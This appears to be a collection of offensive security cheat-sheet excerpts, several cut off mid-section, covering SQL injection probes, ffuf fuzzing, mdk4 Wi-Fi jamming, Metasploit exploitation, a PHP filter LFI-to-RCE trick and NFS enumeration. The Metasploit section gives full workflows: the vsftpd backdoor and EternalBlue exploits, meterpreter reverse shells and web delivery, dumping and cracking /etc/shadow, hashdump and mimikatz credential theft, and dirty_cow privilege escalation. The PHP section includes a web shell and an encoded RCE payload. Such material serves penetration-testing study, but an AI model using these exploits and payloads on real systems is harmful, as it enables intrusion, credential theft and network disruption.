Security-Testing

Identifying SQL Injection Vulnerability Parameters Comments in SQL -- MySQL Linux style --+ MySQL Windows style # Hash (URL encode while use) --+- SQL comment ;%00 Null Byte ` Backtick To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include: id=[Nothing] id=' id='' id=" id=` id=') id=") id=`) id=')) id=")) id=`)) Examples of SQL Injection Testing Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

With the mdk4 tool, you can jam Wi-Fi networks in various ways. This guide will walk you through the installation, setup, and usage of mdk4, including examples for different attacks. 1. Installation If mdk4 is not installed on your system, install it using the following command: sudo apt-get install mdk4 -y Switching to Root User If you are not the root user, switch to root: sudo su Example: kali@gajendra:~$ sudo su 2. Checking Network Interface Status Check your network interface status to see if it’s in monitor mode: ...

🌐 1.Start Metasploit Console sudo systemctl start postgresql msfconsole Initialize the Metasploit Database (First Time Only) msfdb init 🔍 2. Scanning Targets Quick Target Discovery nmap -sn 10.10.10.0/24 Full Port + Version Scan (Integrated with Metasploit DB) db_nmap -sC -sV -O -Pn 10.10.10.129 View Discovered Hosts & Services hosts services 🪡 3. Exploit Search and Module Use Search by service name or CVE search vsftpd search type:exploit name:smb Load a Module use exploit/unix/ftp/vsftpd_234_backdoor Explore Module Info info # Shows full module details (author, platform, options, etc) show options # Required + optional settings (RHOSTS, LHOST, etc) show advanced # Advanced options like threads, timeouts, proxies show payloads # Compatible payloads for this exploit 💡 4. Linux Exploitation Workflow Example: FTP Backdoor use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.10.129 set payload cmd/unix/interact run If Shell is Basic: Upgrade python3 -c 'import pty; pty.spawn("/bin/bash")' Or Use Web Delivery use exploit/multi/script/web_delivery set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 run Post-Exploitation (Linux) sessions -i 1 getuid sysinfo Enumerate OS and Configs run post/linux/gather/enum_os run post/linux/gather/enum_configs Dump Password Hashes download /etc/passwd download /etc/shadow john shadow --wordlist=/usr/share/wordlists/rockyou.txt Local Exploit Suggestion run post/multi/recon/local_exploit_suggester Example Local Root Exploit use exploit/linux/local/dirty_cow set SESSION 1 run Confirm Root id whoami 💻 5. Windows Exploitation Workflow Example: EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.130 set LHOST <your_ip> set payload windows/x64/meterpreter/reverse_tcp run Session Handling sessions sessions -i 1 sysinfo getuid Post-Exploitation (Windows) Dump Hashes hashdump load kiwi kiwi_cmd "lsadump::sam" Process Migration ps migrate <pid> getpid Privilege Escalation getsystem Or use: ...

Target File .htaccess Output with PHP String Filters No Filter Applied Output: Testing PHP Filter Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents. PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?> Payload for LIF to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami Output: www-data

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scanning port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the mounted partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...